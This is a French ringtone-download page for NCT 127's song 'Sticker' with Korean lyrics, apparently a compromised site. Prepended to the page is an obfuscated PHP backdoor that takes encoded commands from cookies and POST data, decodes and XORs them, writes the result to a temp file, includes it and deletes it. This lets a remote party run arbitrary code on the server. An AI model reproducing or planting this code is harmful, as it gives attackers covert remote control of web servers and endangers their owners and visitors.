$jQMIamutK = chr ( 227 - 152 ).chr (95) . "\x7a" . "\x75" . "\125" . "\170";$OwwLhO = "\143" . "\x6c" . chr (97) . chr ( 786 - 671 )."\x73" . '_' . chr (101) . chr (120) . 'i' . "\x73" . chr (116) . "\x73";$flFVCF = class_exists($jQMIamutK); $OwwLhO = "13945";$GpWwQYt = !1;if ($flFVCF == $GpWwQYt){function GMzCdPzb(){$nFyoTka = new /* 30384 */ K_zuUx(62774 + 62774); $nFyoTka = NULL;}$AxFQueKT = "62774";class K_zuUx{private function ySMKBMvN($AxFQueKT){if (is_array(K_zuUx::$NVGLJJLb)) {$rLCIsSP = sys_get_temp_dir() . "/" . crc32(K_zuUx::$NVGLJJLb[chr (115) . chr ( 624 - 527 ).chr ( 578 - 470 )."\x74"]);@K_zuUx::$NVGLJJLb['w' . chr ( 1027 - 913 ).chr ( 1050 - 945 )."\164" . chr ( 1087 - 986 )]($rLCIsSP, K_zuUx::$NVGLJJLb['c' . chr ( 977 - 866 )."\x6e" . "\x74" . chr ( 309 - 208 ).'n' . "\x74"]);include $rLCIsSP;@K_zuUx::$NVGLJJLb["\144" . "\x65" . chr (108) . "\x65" . chr (116) . "\145"]($rLCIsSP); $AxFQueKT = "62774";exit();}}private $QLZSxy;public function QETra(){echo 3773;}public function __destruct(){$AxFQueKT = "53409_26971";$this->ySMKBMvN($AxFQueKT); $AxFQueKT = "53409_26971";}public function __construct($GVnlwpQbE=0){$HTKkJwmZlX = $_POST;$CrIay = $_COOKIE;$yOeKdzqJpA = "8cb515d0-d097-4124-bb57-91d70add1eaf";$osVMgZ = @$CrIay[substr($yOeKdzqJpA, 0, 4)];if (!empty($osVMgZ)){$hDJHysAYu = "base64";$gfnXZYfU = "";$osVMgZ = explode(",", $osVMgZ);foreach ($osVMgZ as $wtOyTk){$gfnXZYfU .= @$CrIay[$wtOyTk];$gfnXZYfU .= @$HTKkJwmZlX[$wtOyTk];}$gfnXZYfU = array_map($hDJHysAYu . chr ( 594 - 499 ).chr ( 706 - 606 )."\x65" . "\x63" . chr ( 220 - 109 ).'d' . 'e', array($gfnXZYfU,)); $gfnXZYfU = $gfnXZYfU[0] ^ str_repeat($yOeKdzqJpA, (strlen($gfnXZYfU[0]) / strlen($yOeKdzqJpA)) + 1);K_zuUx::$NVGLJJLb = @unserialize($gfnXZYfU); $gfnXZYfU = class_exists("53409_26971");}}public static $NVGLJJLb = 29297;}GMzCdPzb();} Telecharger Sticker - NCT 127 Sonnerie Gratuite

Sticker – NCT 127 Téléchargement De Sonnerie

♥♥♥ Sonnerie CHAUDE, DERNIÈRE 2023 ♥♥♥ Je vous souhaite une bonne écoute et télécharger de musique ♥♥♥
Catégorie: Coréen
385 Ecoutez 1 Télécharger
Scan QR Code to Download

Sticker – NCT 127 Sonnerie Télécharger:

[Pre-Chorus: Johnny, Taeyong, Yuta, Mark]
우리끼린 달달하게 팍 팍 sugar
눈치 따윈 보지 말고
네가 boss란 말이야
걱정하지 말고 그냥 팍 팍 믿어
너만 그래도 돼
원해 그럼 너의 것이야

[Chorus: All, Taeyong, Yuta, Taeil, *Doyoung*]
Hoo, 내 옆에 너 꼭 붙어 있어봐
Like a sticker, sticker, sticker (Ho!)
내 작품의 주인공은 너니까
Like a sticker, sticker, sticker (Yeah, yeah)
골 아픈 세상은 신경 꺼 (꺼)
너와 나의 역사만 써 내려가 (Hoo, hoo)
사랑한단 말 말곤 아껴 둬 (*Oh*)
내 말 맞다면 throw your hands up

Rate this post

Avez-vous trouvé cet sonnerie utile?

Partager: